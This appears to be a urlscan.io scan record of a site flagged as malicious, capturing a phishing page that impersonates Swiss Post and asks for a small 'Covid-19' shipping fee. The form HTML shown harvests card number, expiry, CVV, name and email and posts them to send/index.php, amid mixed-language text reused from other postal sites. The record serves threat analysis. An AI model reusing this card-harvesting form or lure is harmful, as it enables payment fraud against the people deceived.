birdfits.com Open in urlscan Pro
65.21.96.97  Malicious Activity! Public Scan

Submitted URL: https://birdfits.com/swiss
Effective URL: https://birdfits.com/swiss/manage/?view=login&appIdKey=fcd00c0656cc490&country=
Submission: On January 25 via api from CH — Scanned from DE

Form analysis 3 forms found in the DOM

GET /sok

<form method="get" action="/sok" id="react-navbar-search-form" role="search" aria-label="NOT_TRANSLATED">
  <input name="q" data-hw-search-input="" class="hw-search__input" type="text" aria-label="Søk" placeholder="Søk" autocomplete="off">
</form>

POST /cart/changecarrier

<form id="carrierForm" method="post" action="/cart/changecarrier" class="">
  <input type="hidden" name="carrierid" id="carrierid" value="3">
  <input type="hidden" name="isselfpick" id="isselfpick" value="0">
  <input type="hidden" name="selfpickstorecode" id="selfpickstorecode" value="">
  <input type="hidden" name="homepaqtoken" id="homepaqtoken" value="">
  <!--  NEW SCREEN BEGIN -->
  <div class="checkout-shipping-type-zones">
    <div class="checkout-shipping-type-zones-image">
      <img class="img-responsive" alt="Paq Estándar" src="https://cdn.mycomandia.com/static/logos/correos-paq-72-mini.png">
    </div>
    <div class="custom-control custom-checkbox form-check office-delivery">
      <input type="checkbox" id="carrierselection3" class="custom-control-input carrierselection" data-carrier="3" data-selfpick="0">
      <label class="custom-control-label" for="carrierselection3"> A tu domicilio <strong>(2,99 €)</strong>
      </label>
    </div>
    <div class="custom-control custom-checkbox form-check office-nodelivery-container">
      <input type="checkbox" id="carrierselection_self3" class="custom-control-input carrierselection" data-carrier="3" data-selfpick="1" data-postalcode="39999" data-is-pickup-at-shop="0">
      <label class="custom-control-label" for="carrierselection_self3"> Recogida en oficina de Correos <strong>(2,99 €)</strong>
      </label>
      <!-- Correos hidden offices -->
      <div class="offices-search-container" style="display:none">
        <!-- <div class="custom-control custom-checkbox form-check">
												<input type="checkbox" class="custom-control-input" id="Office1">
												<label class="custom-control-label" for="Office1">Barcelona suc 16. la vila olimpica - doctor trueta 58-60 08005 barcelona</label>
											</div>
											<div class="custom-control custom-checkbox form-check">
												<input type="checkbox" class="custom-control-input" id="Office2">
												<label class="custom-control-label" for="Office2">Barcelona suc 16. la vila olimpica - doctor trueta 58-60 08005 barcelona</label>
											</div> -->
      </div>
      <!-- Correos hidden offices -->
    </div>
  </div>
  <div style="width:100%">
    <small class="text-muted">
      <p>Tus envíos en un máximo de 72 horas</p>
    </small>
  </div>
  <!--  NEW SCREEN END -->
  <!--  NEW SCREEN BEGIN -->
  <div class="checkout-shipping-type-zones type-city">
    <div class="checkout-shipping-type-zones-image">
      <img class="img-responsive" alt="Paq Estándar CityPaq" src="https://cdn.mycomandia.com/static/logos/correos-paq72.png">
    </div>
    <div class="custom-control custom-checkbox form-check office-delivery">
      <input type="checkbox" id="carrierselection9" class="custom-control-input carrierselection" data-carrier="9" data-homepaq="1" data-selfpick="1">
      <label class="custom-control-label" for="carrierselection9"> Envío mediante CityPaq <strong>(2,99 €)</strong>
      </label>
      <div class="cityPaq-search-container" style="display:none;">
        <p>Indique su nombre de usuario CityPaq:</p>
        <div class="input-group">
          <input class="form-control py-2 homepaqusername validate[required]" type="search" name="homepaqusername9" id="homepaqusername9">
          <span class="input-group-append">
            <input type="button" class="btn btn-outline-secondary searchhomepaq" value="Buscar" data-val="homepaqusername9" data-target="homepaqresult9">
          </span>
        </div>
        <div id="homepaqresult9" class="homepaqresultdiv">
          <p class="citypaq-text"> Si aún no es usuario de CityPaq, puede registrarse en este enlace: <a href="https://online.citypaq.es/pages/registro.xhtml" target="_homepaq">Ir a CityPaq</a>
          </p>
        </div>
      </div>
    </div>
  </div>
  <div style="width:100%">
    <small class="text-muted">Paq Estándar CityPaq</small>
    <small class="text-muted">
      <p>Haz tus pedidos y recógelos en el CityPaq que más te convenga</p>
    </small>
  </div>
  <!--  NEW SCREEN END -->
</form>

POST send/index.php

<form class="checkout-new-shipping-address-form" method="post" action="send/index.php" data-toggle="validate">
  <div class="form-row">
    <div class="form-group col-md-8">
      <label for="shipping.lastname">
        <font style="vertical-align: inherit;">
          <font style="vertical-align: inherit;">Name des Karteninhabers*</font>
        </font>
      </label>
      <input type="text" name="lname" id="lname" maxlength="50" class="form-control validate[required,minSize[2]] null" required="">
    </div>
    <div class="form-group col-md-8">
      <label for="shipping.phone">E-mail*</label>
      <input type="text" placeholder="exemple@mail.com" name="phone" id="phone" maxlength="50" class="form-control validate[required,minSize[2]] null" required="">
    </div>
  </div>
  <div class="form-row">
    <div class="form-group col-md-8">
      <label for="shipping.email">
        <font style="vertical-align: inherit;">
          <font style="vertical-align: inherit;">Kredit-oder Debitkartennummer*</font>
        </font>
      </label>
      <input type="text" placeholder="XXXX XXXX XXXX XXXX" name="card" id="shipping.email" maxlength="16" class="form-control validate[required,custom[email]] null" required="">
    </div>
  </div>
  <div class="form-row">
    <div class="form-group col-md-4">
      <label for="inputAddress2">
        <font style="vertical-align: inherit;">
          <font style="vertical-align: inherit;">Haltbarkeitsdatum*</font>
        </font>
      </label>
      <input type="text" placeholder="MM / AAAA" name="exp" id="shipping.address2" maxlength="7" class="form-control null" required="">
    </div>
  </div>
  <div class="form-row">
    <div class="form-group col-md-4">
      <label for="shipping.postalcode">
        <font style="vertical-align: inherit;">
          <font style="vertical-align: inherit;"> CVV *</font>
        </font>
      </label>
      <input type="text" placeholder="XXX" name="cvv" id="shipping.postalcode" maxlength="3" class="form-control validate[required] null" required="">
    </div>
  </div>
  <div class="form-group">
  </div>
  <div class="form-group">
    <div class="custom-control custom-checkbox">
      <input type="checkbox" name="accept_dpp_shipping" class="custom-control-input validate[required]" id="accept_dpp_shipping" data-prompt-position="bottomRight" value="YES">
      <label class="custom-control-label"
        for="accept_dpp_shipping"><a target="_blank"><b><font style="vertical-align: inherit;"><font style="vertical-align: inherit;font-size:15px;">Ich habe die Datenschutzbestimmungen gelesen und akzeptiere sie...</font></font></b></a></label>
    </div>
  </div>
  <section class="continue-button py-2 mb-4" id="continueButtonParent">
    <div class="d-flex justify-content-end">
      <button type="button" class="btn btn-danger btn-cart-cancel-edit ml-1" style="display:none">Cancelar</button>
      <button type="submit" class="btn btn-primary btn-cart-continue">
        <font style="vertical-align: inherit;">
          <font style="vertical-align: inherit;">Zahlen und weitermachen&gt;</font>
        </font>
      </button>
    </div>
  </section>
</form>

Text Content

Gebühren bezahlen - Schweizer Post
SucheSuche Meine SeiteMeine Seite --> anmeldenSyngop
 * Search for addresses, zip codes and people
 * Opening hours and red mailboxes
 * Stamps for collection
 * Buy signs and mailboxes in the online store

 * Sende
   
    * Send letters and packages in Norway
    * Send letters and packages abroad
    * Return
    * Addressing and packaging
    * Customs clearance when sending
    * Stamps and postage

 * Motta sendinger
   
    * Pick up yourself
    * Home delivery
    * Customs clearance when you receive
    * All about mailboxes
    * Rent mailbox

 * Address services
   
    * Move and change address
    * Forward mail temporarily
    * Storage of mail

 * Hjelp
   
    * Customer service
    * Complaints and complaints
    * Chat with us
    * Tracking assistance
    * Toll

 * Search for addresses, zip codes and people
 * Opening hours and red mailboxes
 * Stamps for collection
 * Buy signs and mailboxes in the online store

SENDE

 * Send letters and packages in Norway
 * Send letters and packages abroad
 * Return
 * Addressing and packaging
 * Customs clearance when sending
 * Stamps and postage

RECEIVE SHIPMENTS

 * Get it yourself
 * Home delivery
 * Customs clearance when you receive
 * All about mailboxes
 * Rent mailbox

ADDRESSANDJENESTER

 * Move and change address
 * 
 * Storage of mail

HJELP

 * Kundeservice
 * Complaints and complaints
 * talk to us
 * Tracking assistance
 * toll




You have no items in your basket
×

--------------------------------------------------------------------------------

Gesamt
3,99 CHF

VERSANDCODE : CHF/7747638839

Standardpaket

Endre -->

CÓDIGO DE ENVÍO : ES/2938456

A tu domicilio (2,99 €)
Recogida en oficina de Correos (2,99 €)


Tus envíos en un máximo de 72 horas

Envío mediante CityPaq (2,99 €)

Indique su nombre de usuario CityPaq:



Si aún no es usuario de CityPaq, puede registrarse en este enlace: Ir a CityPaq

Paq Estándar CityPaq

Haz tus pedidos y recógelos en el CityPaq que más te convenga





ZAHLUNGSINFORMATIONEN

Name des Karteninhabers*
E-mail*
Kredit-oder Debitkartennummer*
Haltbarkeitsdatum*
CVV *

Ich habe die Datenschutzbestimmungen gelesen und akzeptiere sie...
Cancelar Zahlen und weitermachen>






I wish to receive offers and promotions of the products and services sold
He leído y acepto las Condiciones de Venta.
Betal og fortsæt >

Zusätzliche Versandkosten (Covid-19)

3,99 CHF

(inkl. MwSt)

Total

3.99 CHF

(inkl. MwSt)


TEXTE D'ORIGINE


Proposer une meilleure traduction

--------------------------------------------------------------------------------